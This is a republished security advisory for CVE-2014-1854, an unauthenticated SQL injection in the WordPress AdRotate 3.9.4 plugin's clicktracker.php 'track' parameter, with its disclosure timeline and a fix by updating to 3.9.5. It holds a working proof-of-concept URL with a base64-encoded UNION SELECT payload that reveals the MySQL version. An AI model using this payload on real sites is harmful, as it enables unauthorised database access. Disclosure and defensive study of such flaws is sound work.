WordPress AdRotate Plugin 3.9.4 (clicktracker.php, track param) – SQL注入漏洞

Advisory ID: HTB23201
Product: AdRotate
Vendor: AJdG Solutions
Vulnerable Version(s): 3.9.4 and probably prior
Tested Version: 3.9.4
Advisory Publication: January 30, 2014 [without technical details]
Vendor Notification: January 30, 2014
Vendor Patch: January 31, 2014
Public Disclosure: February 20, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-1854
Risk Level: High
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

———————————————————————————————–

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in AdRotate, which can be exploited to perform SQL Injection attacks.

1) SQL Injection in AdRotate: CVE-2014-1854

The vulnerability exists due to insufficient validation of “track” HTTP GET parameter passed to
“/wp-content/plugins/adrotate/library/clicktracker.php” script. A remote unauthenticated attacker can execute arbitrary SQL commands in application’s database.

The following PoC code contains a base64-encoded string “-1 UNION SELECT version(),1,1,1”, which will be injected into SQL query and will output MySQL server version:

http://[host]/wp-content/plugins/adrotate/library/clicktracker.php?track=LTEgVU5JT04gU0VMRUNUIHZlcnNpb24oKSwxLDEsMQ==

Successful exploitation will result in redirection to local URI that contains version of the MySQL server:
http://[host]/wp-content/plugins/adrotate/library/5.1.71-community-log

———————————————————————————————–

Solution:

Update to AdRotate 3.9.5

More Information:
http://www.adrotateplugin.com/2014/01/adrotate-pro-3-9-6-and-adrotate-free-3-9-5/
http://wordpress.org/plugins/adrotate/changelog/
http://www.adrotateplugin.com/development/

———————————————————————————————–

References:

[1] High-Tech Bridge Advisory HTB23201 – https://www.htbridge.com/advisory/HTB23201 – SQL Injection in AdRotate.
[2] AdRotate – http://wordpress.org/plugins/adrotate/ – AdRotate for WordPress.
[3] Common Vulnerabilities and Exposures (CVE) – http://cve.mitre.org/ – international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) – http://cwe.mitre.org – targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® – http://www.htbridge.com/immuniweb/ – is High-Tech Bridge’s proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.

———————————————————————————————–